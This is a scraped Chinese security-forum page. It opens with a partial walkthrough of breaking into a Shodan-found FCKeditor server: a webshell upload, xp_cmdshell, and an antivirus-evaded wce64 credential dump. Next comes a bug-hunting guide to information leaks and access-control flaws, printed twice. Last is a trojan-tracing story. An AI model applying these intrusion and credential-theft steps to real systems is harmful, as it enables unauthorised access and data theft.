    1.在shodan.io网站搜索FCKeditor关键字
       在shodan.io网站搜索FCKeditor关键字
    https://www.shodan.io/search?query=”FCKeditor”对关键字进行查询,不同的关键字其出来的效果不一样。
     
     
    2.逐个查看目标记录信息
       对shodan.io网站搜索的24条记录进行逐个查看,也即单击shodan搜索记录中的Details链接,即可查看目标的详细信息,如图3所示,建议新建窗口打开该链接地址,在该IP地址信息中包含国家、城市、组织、ISP和端口等信息。
     
    1.1.3漏洞利用及分析
     
    1.根据端口访问服务器
       单击shodan中搜索出来的服务信息中的绿色转向箭头即可直接访问目标服务器。
     
     
    2.对网站目录进行逐个查看获取Fckedit漏洞利用页面
       通过对该网站fckeditor 编辑器所在文件夹进行逐层访问,获取其上传测试页面地址:
    http://***.1**.***.***:8081/fckeditor/editor/filemanager/upload/test.html

     
    3.查看和验证上传文件
        如图6所示,到该网站/UserFiles/目录,可以看到上传的2014.aspx及cmd.php文件。
     
     
    4.获取webshell及数据库密码
    单击/UserFiles/目录中的2014.aspx文件,直接获取webshell。
     
     
    5.服务器提权并获取服务器密码
    (1)获取服务器架构
    (2)连接数据库恢复xp_cmdshell
        在webshell中单击DataBase进行数据库管理,选择mssql,然后输入sa账号对应的密码,进行连接,连接成功后,在SQLExec中选择Add xp_cmdshell。
    (3)获取当前数据库管理员密码明文
    将wce64.exe进行免杀处理,然后上传到服务器上,通过xp_cmdshell执行命令:
    Exec master.dbo.xp_cmdshell 'E:\dlty\UserFiles\wce64 -w'
     
     1.1.4渗透总结及分析
    1. sqlserver 2000直接提权。在本例中还可以通过sqlmap进行mssql数据库直连进行提权以及执行命令等操作,由于本案例中的数据库是sqlserver 2000,sa账号可以直接提权到服务器权限。
    2.Fckeditor中的test.html文件可以直接上传任意文件类型
    3.可以通过Fckeditor还可以浏览目录。这个在渗透中特别有用,可以用来查看网站的目录结构,运气好,可以查看xml配置文件,以及下载源代码文件等。
    4.在本案例中的目录信息危害太大。可以对所有文件及目录进行查看,即使未获取编辑器漏洞,也可以通过源代码文件获取数据库密码。

    挖洞技巧:信息泄露总结(转)

    Web安全渗透main 发表了文章 • 0 个评论 • 39 次浏览 • 4 天前 • 来自相关话题

    Web方面的信息泄露:

    0x01  用户信息泄露:

    ①:评论处

    一般用户评论处用户的信息都是加密的,比如显示的是用户手机号或邮箱等,就会直接对中间的一段数字进行加密,但是有些可能就没有加密,而是直接显示出来,那么这就造成了用户信息泄露问题。

    如果加密不当,直接游览用户评论处时进行抓包,然后查看返回包就可以直接看到明文,但有的时候会有2个参数,就比如name:1333******1这个值是加密的,但后面还会有一个testname这个参数就没有进行加密,从而导致用户信息泄露。

    这里有一些小技巧,就比如一个买卖市场,他有用户评论的地方,有一个秒杀抢购成功的展示用户的地方,还有一个是用户相互交流的地方,一般白帽子测试了第一个功能处发现不存在问题,然后就不继续测试其它相同功能处了,这个疏忽就可能会导致错过一个发现问题的机会,每个功能处,加密机制有时候就会被漏掉,就比如用户评论处用户信息加了密,但是秒杀抢购成功的展示用户的地方却没有加密,所以白帽子要更细心点。

    一般评论处都会有一个追加评论功能和一个商家回复功能,那么此时如果对这个功能参数没有加以加密,那么通过抓包游览查看返回包就可看到追加评论的用户信息和商家信息。

    有些评论功能当中支持艾特(@)他人,那么在这个评论当中你通过@他人,然后输入信息点击发送到评论处时,通关抓包就可看到刚刚@的那个用户的明文信息。

    当这个网站评论地方被搜索引擎爬虫到了,那么可以尝试利用搜索命令site:XXXX.com inurl:XX目录在搜索引擎当中搜索,如果加密不完全,那么就可以在搜索引擎当中看到明文信息。

    关于这类的信息泄露问题我找到了相关例子:
    http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0104766.html
      ②:转账处

    很多大型公司都有自家的金融平台,然后在转账处,当你输入对方的转账的账户,比如手机号或者邮箱,然后当你点击其它地方,它会向服务器发送一条验证信息,验证输入的此账户是否存在,如果存在,返回对应的手机号或者邮箱账户的用户姓名,比如*王(1333333XXX)这样的返回信息,那么如果此时前端加密不当,可以通过抓包拦截这条请求,查看返回信息,就可看到明文的姓名。

    关于这类问题,我找到了相关例子:
    http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0124969.html

    一般在转账处输入手机号或邮箱账户的旁边,有一个历史转账信息,一个迷你的小页面,当你点击后会看到之前转账成功的信息,但是,如果此页面加密不全,那么在点击查看历史转账信息时直接抓包查看返回内容就可看到明文的姓名。③:搜索处

    有些平台内置了搜索功能,跟搜索引擎思路很像,同样也是随意搜索,如果此时搜索的结果包含用户信息这块,那么就可能会导致用户信息泄露问题。

    关于这类问题,我找到了相关例子:
    http://wooyun.jozxing.cc/static/bugs/wooyun-2014-069909.html[url=http://wooyun.jozxing.cc/static/bugs/wooyun-2014-069909.html]
    [/url] ④:个人页面处

    在个人页面当中,直接游览时直接抓包,查看返回包就可看到用户信息是否未加密完全。比如一些金融APP,如果加密不当,当点击个人界面时通过抓包查看返回包就可看到明文的身份证信息和用户名以及手机号。

    当然这里不是只有涉及金融APP方面的才会有这个问题,只要是可以查看个人页面处都可能存在。

    在查看银行卡信息那里,一般都是加了密的,但查看银行卡信息处时进行抓包查看返回包的时候就可看到明文的银行卡卡号信息和姓名信息。⑤:客服处

    这个问题属于客服安全方面意思不足,大一点的来看就是公司没有对客服进行安全培训等,当你询问客服某手机号对应的姓名时,客服就会直接把姓名发你,当然这要考验你是怎么问的了,还有如果失败了不要放弃,换一个客服继续测试。 

    0x02  越权方面的用户信息泄露

    ①:任意查看

    很多平台需要进行实名制认证,在上传实名制所需要的身份证照片等信息图片时,如果没有对所产生的文件名格式进行复杂化的话,那么极有可能会存在任意查看,通过批量的方式就可以进行这些步骤,比如你上传了图片,服务器生成的图片地址是XXX.com/xxx/xx/012313.jpg这样短的数字格式文件名的话,就会存在该问题。

    购物平台当中,在添加地址或修改地址的地方,如果权限没过滤好,就可以越权进行查看任意用户的地址信息。

    在某些平台当中,支持添加子账户,然后随便添加一个子账户,然后在查看该子账户的时候进行抓包,修改其ID值,就可以查看任意账户信息

    有些平台有操作日志或其它日志功能,那么如果此时对当前用户的权限过滤不当,那么就可以查看全部用户操作时产生的日志,从而导致信息泄露。

    在很多金融平台当中,在修改昵称那里或者查看个人信息那里,提交时抓包,修改其用户值为存在用户的任意值,那么就可能造成查看任意用户信息的问题。

    如果你进入了一些内部员工平台,那么如果具有搜索功能,就比如你输入了员工工号然后它会返回这个员工的所有在职信息,那么此时你可以通过抓包批量进行提交员工工号,就可造成大范围的信息泄露。

    随便买一个东西生成订单,如果此时权限控制不当,就可以越权查看到任意用户的订单,那么信息也自认而然的泄露出来了。

    关于这方面,我找到了相关例子:

    http://wooyun.jozxing.cc/static/bugs/wooyun-2014-083157.html
     ②:任意重置

    如果权限控制不当,可导致任意用户密码修改的话,那么登录后就可查看该用户的任意信息,这也就导致了用户信息泄露。 ③:任意修改

    在下单的时候修改其用户ID为任意存在用户的ID,然后下单,然后查看刚刚下单的信息,就可看到该用户的收货地址信息,只要对方设置了收货地址。



     

    0x03 接口方面的用户信息泄露

    很多业务网站在上线的时候都忘记把测试时的接口进行关闭,从而导致这个接口可以查询大量用户信息。那么此类接口怎么找呢?

    其中之一的方法通过Github.com网站进行搜索相关域名进行查找。
    关于这类问题,我找到了相关例子:
    http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0116563.html
     

    0x04 注入方面的用户信息泄露

    注入可以说是非常非常的严重,因为注入往往都能得到很多信息,如果没做好相关过滤以及防护,就可导致注入,从而数据库内的各种数据面对裸露的危险。 

    0x05  服务器路径信息泄露

    ①:上传图片处

    在上传图片处,这里我说下最可能存在问题的点,就是关于上传相关证明,进行实名制上传信息等功能页面,在上传图片时进行抓包,然后查看返回包,那么就可看到当前服务器的绝对路径信息。②:XML处

    一些XML限制或删除不完全,可导致服务器等信息泄露。

    详细例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0123762.html③:第三方的服务当中

    很多,如:Apache Tomcat、Struts2、CMS、zabbix、Nginx等等,例如Nginx的某版本解析漏洞,就可造成路径信息泄露。

    关于这方面我找到了相关例子:

    http://wooyun.jozxing.cc/static/bugs/wooyun-2013-019253.html

    http://wooyun.jozxing.cc/static/bugs/wooyun-2012-04655.html

    ④:利用报错问题

    在处理报错信息的问题上如果处理不当,就可导致路径信息泄露,比如访问一些不存在的文件等思路。

    这里我找到了相关例子:

    http://wooyun.jozxing.cc/static/bugs/wooyun-2012-010115.html

    http://wooyun.jozxing.cc/static/bugs/wooyun-2011-02219.html

    http://wooyun.jozxing.cc/static/bugs/wooyun-2012-09901.html

    以上就是关于服务器路径信息泄露问题!
      

    0x06  员工信息泄露

    ①:各第三方平台当中

    Github,很不错的开源社区平台。一些员工喜欢将自己的信息上传到这平台上,但是往往忽视了安全,有时这上传的代码当中就可能包含很多内部测试员工的账户以及密码信息等。

    关于这方面我找到了相关例子:

    http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0177720.html

    http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0164337.html


    在搜索QQ群那里,通过搜索企业昵称,往往都可以搜索出来关于企业员工或企业方面的信息,一般都会贴在公告当中,比如某某测试账户等。

    当然,你也可以申请加入群进行查看群文件,看是否有铭感的信息。

    这里我找到了相关例子:

    http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0128511.html

    http://wooyun.jozxing.cc/static/bugs/wooyun-2015-093927.html

    http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0208105.html


    百度贴吧当中,一般都有公司员工创建的贴吧,如果安全意思不足,那么就会泄露相关员工工号,可用作暴力破解的字典。



    ②:弱密码问题

    在一些涉及内部员工方面的系统,如果员工密码为弱密码,那么就可通过暴力破解方式进行尝试登录,如果成功爆破到了员工账户,那么一般只要是内部员工系统该账户都可以登录,那么所造成的影响也是很大的。

    以上就是关于员工信息泄露的问题! 

    0x07  数据库信息以及服务器信息泄露

    ①:各第三方平台当中

    Github,一些员工如果安全意识不足,同样上传的代码当中就包含了数据库连接信息以及服务器信息。

    关于这类问题,我找到了相关例子:
    http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0180848.html


    利用搜索QQ群的思路,如果员工的安全意识不足,那么数据库连接信息以及服务器信息就会在公告或群文件当中②:XML处

    同样在XML文件当中,也可能会发现数据库连接信息以及服务器信息。③:svn处

    svn是一个开放源代码的版本控制系统,如果没有加以限制或者删除,那么就可以游览相关的比较隐蔽性的源码。

    关于这类的问题,我找到了相关例子:
    http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0199607.html

    http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0191202.html
    ④:数据库文件

    一些数据库相关文件如果删除不当或者摆放位置不当,那么极有可能被下载下来,造成危害。

    关于这方面,我找到了相关例子:
    http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0158556.html
    ⑤:其它文件

    比如其它类型的文件,如Txt、Doc、Excel等文件,如果包含铭感信息,那么危害也是显而易见的。

    以上就是关于数据库信息以及服务器信息泄露的问题! 查看全部
    Web方面的信息泄露:


    0x01  用户信息泄露:


    ①:评论处

    一般用户评论处用户的信息都是加密的,比如显示的是用户手机号或邮箱等,就会直接对中间的一段数字进行加密,但是有些可能就没有加密,而是直接显示出来,那么这就造成了用户信息泄露问题。

    如果加密不当,直接游览用户评论处时进行抓包,然后查看返回包就可以直接看到明文,但有的时候会有2个参数,就比如name:1333******1这个值是加密的,但后面还会有一个testname这个参数就没有进行加密,从而导致用户信息泄露。

    这里有一些小技巧,就比如一个买卖市场,他有用户评论的地方,有一个秒杀抢购成功的展示用户的地方,还有一个是用户相互交流的地方,一般白帽子测试了第一个功能处发现不存在问题,然后就不继续测试其它相同功能处了,这个疏忽就可能会导致错过一个发现问题的机会,每个功能处,加密机制有时候就会被漏掉,就比如用户评论处用户信息加了密,但是秒杀抢购成功的展示用户的地方却没有加密,所以白帽子要更细心点。

    一般评论处都会有一个追加评论功能和一个商家回复功能,那么此时如果对这个功能参数没有加以加密,那么通过抓包游览查看返回包就可看到追加评论的用户信息和商家信息。

    有些评论功能当中支持艾特(@)他人,那么在这个评论当中你通过@他人,然后输入信息点击发送到评论处时,通关抓包就可看到刚刚@的那个用户的明文信息。

    当这个网站评论地方被搜索引擎爬虫到了,那么可以尝试利用搜索命令site:XXXX.com inurl:XX目录在搜索引擎当中搜索,如果加密不完全,那么就可以在搜索引擎当中看到明文信息。

    关于这类的信息泄露问题我找到了相关例子:
    http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0104766.html
     
     
    ②:转账处

    很多大型公司都有自家的金融平台,然后在转账处,当你输入对方的转账的账户,比如手机号或者邮箱,然后当你点击其它地方,它会向服务器发送一条验证信息,验证输入的此账户是否存在,如果存在,返回对应的手机号或者邮箱账户的用户姓名,比如*王(1333333XXX)这样的返回信息,那么如果此时前端加密不当,可以通过抓包拦截这条请求,查看返回信息,就可看到明文的姓名。

    关于这类问题,我找到了相关例子:
    http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0124969.html

    一般在转账处输入手机号或邮箱账户的旁边,有一个历史转账信息,一个迷你的小页面,当你点击后会看到之前转账成功的信息,但是,如果此页面加密不全,那么在点击查看历史转账信息时直接抓包查看返回内容就可看到明文的姓名。
    ③:搜索处

    有些平台内置了搜索功能,跟搜索引擎思路很像,同样也是随意搜索,如果此时搜索的结果包含用户信息这块,那么就可能会导致用户信息泄露问题。

    关于这类问题,我找到了相关例子:
    http://wooyun.jozxing.cc/static/bugs/wooyun-2014-069909.html[url=http://wooyun.jozxing.cc/static/bugs/wooyun-2014-069909.html]
    [/url]
     
    ④:个人页面处

    在个人页面当中,直接游览时直接抓包,查看返回包就可看到用户信息是否未加密完全。比如一些金融APP,如果加密不当,当点击个人界面时通过抓包查看返回包就可看到明文的身份证信息和用户名以及手机号。

    当然这里不是只有涉及金融APP方面的才会有这个问题,只要是可以查看个人页面处都可能存在。

    在查看银行卡信息那里,一般都是加了密的,但查看银行卡信息处时进行抓包查看返回包的时候就可看到明文的银行卡卡号信息和姓名信息。
    ⑤:客服处

    这个问题属于客服安全方面意思不足,大一点的来看就是公司没有对客服进行安全培训等,当你询问客服某手机号对应的姓名时,客服就会直接把姓名发你,当然这要考验你是怎么问的了,还有如果失败了不要放弃,换一个客服继续测试。
     


    0x02  越权方面的用户信息泄露


    ①:任意查看

    很多平台需要进行实名制认证,在上传实名制所需要的身份证照片等信息图片时,如果没有对所产生的文件名格式进行复杂化的话,那么极有可能会存在任意查看,通过批量的方式就可以进行这些步骤,比如你上传了图片,服务器生成的图片地址是XXX.com/xxx/xx/012313.jpg这样短的数字格式文件名的话,就会存在该问题。

    购物平台当中,在添加地址或修改地址的地方,如果权限没过滤好,就可以越权进行查看任意用户的地址信息。

    在某些平台当中,支持添加子账户,然后随便添加一个子账户,然后在查看该子账户的时候进行抓包,修改其ID值,就可以查看任意账户信息

    有些平台有操作日志或其它日志功能,那么如果此时对当前用户的权限过滤不当,那么就可以查看全部用户操作时产生的日志,从而导致信息泄露。

    在很多金融平台当中,在修改昵称那里或者查看个人信息那里,提交时抓包,修改其用户值为存在用户的任意值,那么就可能造成查看任意用户信息的问题。

    如果你进入了一些内部员工平台,那么如果具有搜索功能,就比如你输入了员工工号然后它会返回这个员工的所有在职信息,那么此时你可以通过抓包批量进行提交员工工号,就可造成大范围的信息泄露。

    随便买一个东西生成订单,如果此时权限控制不当,就可以越权查看到任意用户的订单,那么信息也自认而然的泄露出来了。

    关于这方面,我找到了相关例子:

    http://wooyun.jozxing.cc/static/bugs/wooyun-2014-083157.html
     
    ②:任意重置

    如果权限控制不当,可导致任意用户密码修改的话,那么登录后就可查看该用户的任意信息,这也就导致了用户信息泄露。
     
    ③:任意修改

    在下单的时候修改其用户ID为任意存在用户的ID,然后下单,然后查看刚刚下单的信息,就可看到该用户的收货地址信息,只要对方设置了收货地址。



     


    0x03 接口方面的用户信息泄露


    很多业务网站在上线的时候都忘记把测试时的接口进行关闭,从而导致这个接口可以查询大量用户信息。那么此类接口怎么找呢?

    其中之一的方法通过Github.com网站进行搜索相关域名进行查找。
    关于这类问题,我找到了相关例子:
    http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0116563.html
     


    0x04 注入方面的用户信息泄露


    注入可以说是非常非常的严重,因为注入往往都能得到很多信息,如果没做好相关过滤以及防护,就可导致注入,从而数据库内的各种数据面对裸露的危险。
     


    0x05  服务器路径信息泄露


    ①:上传图片处

    在上传图片处,这里我说下最可能存在问题的点,就是关于上传相关证明,进行实名制上传信息等功能页面,在上传图片时进行抓包,然后查看返回包,那么就可看到当前服务器的绝对路径信息。
    ②:XML处

    一些XML限制或删除不完全,可导致服务器等信息泄露。

    详细例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0123762.html
    ③:第三方的服务当中

    很多,如:Apache Tomcat、Struts2、CMS、zabbix、Nginx等等,例如Nginx的某版本解析漏洞,就可造成路径信息泄露。

    关于这方面我找到了相关例子:

    http://wooyun.jozxing.cc/static/bugs/wooyun-2013-019253.html

    http://wooyun.jozxing.cc/static/bugs/wooyun-2012-04655.html

    ④:利用报错问题

    在处理报错信息的问题上如果处理不当,就可导致路径信息泄露,比如访问一些不存在的文件等思路。

    这里我找到了相关例子:

    http://wooyun.jozxing.cc/static/bugs/wooyun-2012-010115.html

    http://wooyun.jozxing.cc/static/bugs/wooyun-2011-02219.html

    http://wooyun.jozxing.cc/static/bugs/wooyun-2012-09901.html

    以上就是关于服务器路径信息泄露问题!

      


    0x06  员工信息泄露


    ①:各第三方平台当中

    Github,很不错的开源社区平台。一些员工喜欢将自己的信息上传到这平台上,但是往往忽视了安全,有时这上传的代码当中就可能包含很多内部测试员工的账户以及密码信息等。

    关于这方面我找到了相关例子:

    http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0177720.html

    http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0164337.html


    在搜索QQ群那里,通过搜索企业昵称,往往都可以搜索出来关于企业员工或企业方面的信息,一般都会贴在公告当中,比如某某测试账户等。

    当然,你也可以申请加入群进行查看群文件,看是否有铭感的信息。

    这里我找到了相关例子:

    http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0128511.html

    http://wooyun.jozxing.cc/static/bugs/wooyun-2015-093927.html

    http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0208105.html


    百度贴吧当中,一般都有公司员工创建的贴吧,如果安全意思不足,那么就会泄露相关员工工号,可用作暴力破解的字典。



    ②:弱密码问题

    在一些涉及内部员工方面的系统,如果员工密码为弱密码,那么就可通过暴力破解方式进行尝试登录,如果成功爆破到了员工账户,那么一般只要是内部员工系统该账户都可以登录,那么所造成的影响也是很大的。

    以上就是关于员工信息泄露的问题!
     


    0x07  数据库信息以及服务器信息泄露


    ①:各第三方平台当中

    Github,一些员工如果安全意识不足,同样上传的代码当中就包含了数据库连接信息以及服务器信息。

    关于这类问题,我找到了相关例子:
    http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0180848.html


    利用搜索QQ群的思路,如果员工的安全意识不足,那么数据库连接信息以及服务器信息就会在公告或群文件当中
    ②:XML处

    同样在XML文件当中,也可能会发现数据库连接信息以及服务器信息。
    ③:svn处

    svn是一个开放源代码的版本控制系统,如果没有加以限制或者删除,那么就可以游览相关的比较隐蔽性的源码。

    关于这类的问题,我找到了相关例子:
    http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0199607.html

    http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0191202.html
    ④:数据库文件

    一些数据库相关文件如果删除不当或者摆放位置不当,那么极有可能被下载下来,造成危害。

    关于这方面,我找到了相关例子:
    http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0158556.html
    ⑤:其它文件

    比如其它类型的文件,如Txt、Doc、Excel等文件,如果包含铭感信息,那么危害也是显而易见的。

    以上就是关于数据库信息以及服务器信息泄露的问题!

    记一次木马的发现[转]

    网络安全你可以叫我风平 发表了文章 • 0 个评论 • 9 次浏览 • 1 天前 • 来自相关话题

            昨天清理磁盘,整理旧文件的时候,轻信直接打开了wooyun zone里某位白帽子分享的工具,一时大意,中马了。
            PC机上有个360安全卫士,也没有一丁点的提示。。。(这木马过360的)
            随后我在修改subDomainsBrute的时候,抓dns query,惊讶地发现,出现了一个3322.org的域名,并且对应记录是不存在的,如下图:





     
            以前玩远控木马的同学可能知道,3322.0rg,花生壳之类的,常常被用来木马在内网反向上线的。所以,这个地方十分不正常,这让我意识到,有较大的几率已经中马了。
           用360安全卫士扫描,没有发现任何木马和危险项,之前也提到了,这个木马是过360的。
           现在的问题是,如何抓到这个木马,我绕了一个弯子,因为我想从dns query入手来查找(正确的做法是打开进程查看器,逐个进程检查):
    1.我们已经知道,木马会主动去连likang.3322.org,但是wireshark是抓不到进程pid,它仅仅支持从某一网卡抓包,并不关心包来自于哪个进程
     
    2.即使能抓到DNS查询的对应进程,其实也只能抓到windows下的DNS Client:svchost.exe进程,实际并无意义,我们依然不知道背后到底是哪个进程在请求likang.3322.org
            在抓dns query源进程受阻的情况下,我想到,既然木马想访问likang.3322.org,而这个域名又不存在。 那么我应该可以欺骗它去访问我自己的服务器,我修改hosts文件,添加:
    11.22.33.44 likang.3322.org        这个时候,我应该可以抓到访问likang.3322.org的其他请求了。
     
            我用smartsniff抓包,发现有到目标11.22.33.44的http request,木马会请求likang.3322.org/ip.txt看起来像是一个DDOS木马,下载攻击目标的。
     
            这个时候我还是没抓到进程,对应的likang.3322.org/ip.txt文件并不存在,http request一瞬间就结束了,tcp查看工具因为刷新频率的原因,还看不到对应的进程。
    于是我在11.22.33.44上python起了一个http server,并且让get请求hang住,sleep 30s,最终抓到了对应的进程:




           如图,QQ进程:





            总结一下,上面也说到,正确的做法,应该是查看进程列表,然后逐个检查进程是否正常,从 启动时间 |  可执行文件的创建日期 等特征对比。
          绕个弯子,换了个思路。
     
     
      查看全部
            昨天清理磁盘,整理旧文件的时候,轻信直接打开了wooyun zone里某位白帽子分享的工具,一时大意,中马了。
            PC机上有个360安全卫士,也没有一丁点的提示。。。(这木马过360的)
            随后我在修改subDomainsBrute的时候,抓dns query,惊讶地发现,出现了一个3322.org的域名,并且对应记录是不存在的,如下图:

    likang.3322_.org__.png

     
            以前玩远控木马的同学可能知道,3322.0rg,花生壳之类的,常常被用来木马在内网反向上线的。所以,这个地方十分不正常,这让我意识到,有较大的几率已经中马了。
           用360安全卫士扫描,没有发现任何木马和危险项,之前也提到了,这个木马是过360的。
           现在的问题是,如何抓到这个木马,我绕了一个弯子,因为我想从dns query入手来查找(正确的做法是打开进程查看器,逐个进程检查):
    1.我们已经知道,木马会主动去连likang.3322.org,但是wireshark是抓不到进程pid,它仅仅支持从某一网卡抓包,并不关心包来自于哪个进程
     
    2.即使能抓到DNS查询的对应进程,其实也只能抓到windows下的DNS Client:svchost.exe进程,实际并无意义,我们依然不知道背后到底是哪个进程在请求likang.3322.org
            在抓dns query源进程受阻的情况下,我想到,既然木马想访问likang.3322.org,而这个域名又不存在。 那么我应该可以欺骗它去访问我自己的服务器,我修改hosts文件,添加:
    11.22.33.44	likang.3322.org
            这个时候,我应该可以抓到访问likang.3322.org的其他请求了。
     
            我用smartsniff抓包,发现有到目标11.22.33.44的http request,木马会请求likang.3322.org/ip.txt看起来像是一个DDOS木马,下载攻击目标的。
     
            这个时候我还是没抓到进程,对应的likang.3322.org/ip.txt文件并不存在,http request一瞬间就结束了,tcp查看工具因为刷新频率的原因,还看不到对应的进程。
    于是我在11.22.33.44上python起了一个http server,并且让get请求hang住,sleep 30s,最终抓到了对应的进程:
    virus_found.png

           如图,QQ进程:

    process_QQ.png

            总结一下,上面也说到,正确的做法,应该是查看进程列表,然后逐个检查进程是否正常,从 启动时间 |  可执行文件的创建日期 等特征对比。
          绕个弯子,换了个思路。